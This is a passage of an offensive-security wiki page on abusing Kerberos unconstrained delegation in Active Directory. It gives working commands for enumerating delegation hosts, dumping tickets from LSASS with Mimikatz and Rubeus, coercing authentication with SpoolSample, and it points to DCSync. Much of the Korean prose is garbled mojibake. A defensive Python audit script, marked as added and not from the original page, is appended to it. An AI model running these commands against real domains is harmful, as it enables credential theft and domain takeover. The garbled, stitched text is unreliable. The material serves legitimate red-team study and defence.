Unconstrained Delegation

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Unconstrained delegation

์ด๊ฒƒ์€ ๋„๋ฉ”์ธ ๊ด€๋ฆฌ์ž๊ฐ€ ๋„๋ฉ”์ธ ๋‚ด์˜ ๋ชจ๋“  ์ปดํ“จํ„ฐ์— ์„ค์ •ํ•  ์ˆ˜ ์žˆ๋Š” ๊ธฐ๋Šฅ์ž…๋‹ˆ๋‹ค. ๊ทธ๋Ÿฐ ๋‹ค์Œ, ์‚ฌ์šฉ์ž๊ฐ€ ์ปดํ“จํ„ฐ์— ๋กœ๊ทธ์ธํ•  ๋•Œ๋งˆ๋‹ค ํ•ด๋‹น ์‚ฌ์šฉ์ž์˜ TGT ๋ณต์‚ฌ๋ณธ์ด DC์—์„œ ์ œ๊ณตํ•˜๋Š” TGS ๋‚ด๋กœ ์ „์†ก๋˜๊ณ  LSASS์˜ ๋ฉ”๋ชจ๋ฆฌ์— ์ €์žฅ๋ฉ๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ ํ•ด๋‹น ๋จธ์‹ ์—์„œ ๊ด€๋ฆฌ์ž ๊ถŒํ•œ์ด ์žˆ๋Š” ๊ฒฝ์šฐ, ํ‹ฐ์ผ“์„ ๋คํ”„ํ•˜๊ณ  ์‚ฌ์šฉ์ž๋ฅผ ๊ฐ€์žฅํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋”ฐ๋ผ์„œ ๋„๋ฉ”์ธ ๊ด€๋ฆฌ์ž๊ฐ€ โ€œUnconstrained Delegationโ€ ๊ธฐ๋Šฅ์ด ํ™œ์„ฑํ™”๋œ ์ปดํ“จํ„ฐ์— ๋กœ๊ทธ์ธํ•˜๊ณ , ํ•ด๋‹น ๋จธ์‹ ์—์„œ ๋กœ์ปฌ ๊ด€๋ฆฌ์ž ๊ถŒํ•œ์ด ์žˆ๋Š” ๊ฒฝ์šฐ, ํ‹ฐ์ผ“์„ ๋คํ”„ํ•˜๊ณ  ๋„๋ฉ”์ธ ๊ด€๋ฆฌ์ž๋ฅผ ์–ด๋””์„œ๋“  ๊ฐ€์žฅํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค (๋„๋ฉ”์ธ ๊ถŒํ•œ ์ƒ์Šน).

์ด ์†์„ฑ์„ ๊ฐ€์ง„ ์ปดํ“จํ„ฐ ๊ฐ์ฒด๋ฅผ ์ฐพ์œผ๋ ค๋ฉด userAccountControl ์†์„ฑ์ด ADS_UF_TRUSTED_FOR_DELEGATION๋ฅผ ํฌํ•จํ•˜๋Š”์ง€ ํ™•์ธํ•˜๋ฉด ๋ฉ๋‹ˆ๋‹ค. ์ด๋Š” LDAP ํ•„ํ„ฐ โ€˜(userAccountControl:1.2.840.113556.1.4.803:=524288)โ€™๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋Š” powerview๊ฐ€ ์ˆ˜ํ–‰ํ•˜๋Š” ์ž‘์—…์ž…๋‹ˆ๋‹ค:

# List unconstrained computers
## Powerview
## DCs always appear and might be useful to attack a DC from another compromised DC from a different domain (coercing the other DC to authenticate to it)
Get-DomainComputer -Unconstrained -Properties name
Get-DomainUser -LdapFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)'

## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem

# Export tickets with Mimikatz
## Access LSASS memory
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way

# Monitor logins and export new tickets
## Doesn't access LSASS memory directly, but uses Windows APIs
Rubeus.exe dump
Rubeus.exe monitor /interval:10 [/filteruser:<username>] #Check every 10s for new TGTs

Load the Administrator's (or victim user's) ticket into memory with Mimikatz or Rubeus for a Pass the Ticket.
More info: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
More information about Unconstrained delegation on ired.team.

Force Authentication

๊ณต๊ฒฉ์ž๊ฐ€ โ€œUnconstrained Delegationโ€œ์ด ํ—ˆ์šฉ๋œ ์ปดํ“จํ„ฐ๋ฅผ ํƒ€๋ฝ์‹œํ‚ฌ ์ˆ˜ ์žˆ๋‹ค๋ฉด, ๊ทธ๋Š” Print server๋ฅผ ์†์—ฌ์„œ ์ž๋™์œผ๋กœ ๋กœ๊ทธ์ธํ•˜๊ฒŒ ํ•˜์—ฌ ์„œ๋ฒ„์˜ ๋ฉ”๋ชจ๋ฆฌ์— TGT๋ฅผ ์ €์žฅํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
๊ทธ๋Ÿฐ ๋‹ค์Œ, ๊ณต๊ฒฉ์ž๋Š” ์‚ฌ์šฉ์ž Print server ์ปดํ“จํ„ฐ ๊ณ„์ •์„ ๊ฐ€์žฅํ•˜๊ธฐ ์œ„ํ•ด Pass the Ticket ๊ณต๊ฒฉ์„ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

To make a print server log in against any machine you can use SpoolSample:

.\SpoolSample.exe <printmachine> <unconstrainedmachine>

If the TGT is from a domain controller, you could perform a DCSync attack and obtain all the hashes from the DC.
More info about this attack on ired.team.

์—ฌ๊ธฐ์—์„œ ์ธ์ฆ์„ ๊ฐ•์ œํ•˜๋Š” ๋‹ค๋ฅธ ๋ฐฉ๋ฒ•์„ ์ฐพ์œผ์„ธ์š”:

Force NTLM Privileged Authentication

Mitigation

  • Limit DA/Admin logins to specific services
  • Set "Account is sensitive and cannot be delegated" for privileged accounts
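The enumeration filter above and the "cannot be delegated" mitigation can both be audited offline against exported directory data. The following is an added example, not code from the original page or from HackTricks; the directory entries, account names and group memberships are constructed sample data, and the flag constants are the standard userAccountControl bit values.

```python
# Added example (not from the original page): evaluate userAccountControl bits
# the way the LDAP matching rule 1.2.840.113556.1.4.803 (bitwise AND) does, to
# find unconstrained-delegation hosts and privileged accounts that are still
# delegatable. The entries below are constructed sample data, not real hosts.
TRUSTED_FOR_DELEGATION = 0x80000   # ADS_UF_TRUSTED_FOR_DELEGATION = 524288
NOT_DELEGATED = 0x100000           # "Account is sensitive and cannot be delegated"
SERVER_TRUST_ACCOUNT = 0x2000      # set on domain controller computer objects

# Constructed sample of what an LDAP search would return.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "DC01$", "objectCategory": "computer",
     "userAccountControl": 0x80000 | 0x2000 | 0x200 | 0x20},
    {"sAMAccountName": "FILESRV01$", "objectCategory": "computer",
     "userAccountControl": 0x80000 | 0x1000},
    {"sAMAccountName": "WS01$", "objectCategory": "computer",
     "userAccountControl": 0x1000},
    {"sAMAccountName": "da.alice", "objectCategory": "person",
     "userAccountControl": 0x200, "memberOf": ["Domain Admins"]},
    {"sAMAccountName": "da.bob", "objectCategory": "person",
     "userAccountControl": 0x200 | 0x100000, "memberOf": ["Domain Admins"]},
]

def bitwise_and_match(uac: int, mask: int) -> bool:
    """Equivalent of (userAccountControl:1.2.840.113556.1.4.803:=<mask>)."""
    return (uac & mask) == mask

def ldap_filter_unconstrained(computers_only: bool = True) -> str:
    """Build the filter the PowerView/ADSearch commands on this page rely on."""
    clause = f"(userAccountControl:1.2.840.113556.1.4.803:={TRUSTED_FOR_DELEGATION})"
    return f"(&(objectCategory=computer){clause})" if computers_only else clause

def find_unconstrained_hosts(entries, include_dcs=False):
    """Computers with unconstrained delegation; DCs are skipped by default
    because they always carry the flag and are not a finding by themselves."""
    out = []
    for e in entries:
        uac = e["userAccountControl"]
        if e["objectCategory"] != "computer" or not bitwise_and_match(uac, TRUSTED_FOR_DELEGATION):
            continue
        if not include_dcs and bitwise_and_match(uac, SERVER_TRUST_ACCOUNT):
            continue
        out.append(e["sAMAccountName"])
    return out

def privileged_without_not_delegated(entries, privileged_groups=("Domain Admins",)):
    """Privileged accounts that still lack the NOT_DELEGATED mitigation bit."""
    return [e["sAMAccountName"] for e in entries
            if e["objectCategory"] == "person"
            and any(g in e.get("memberOf", []) for g in privileged_groups)
            and not bitwise_and_match(e["userAccountControl"], NOT_DELEGATED)]
```

Feed it the userAccountControl and memberOf values from a real export and the two lists are the hosts to review and the accounts that still need the "cannot be delegated" setting.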
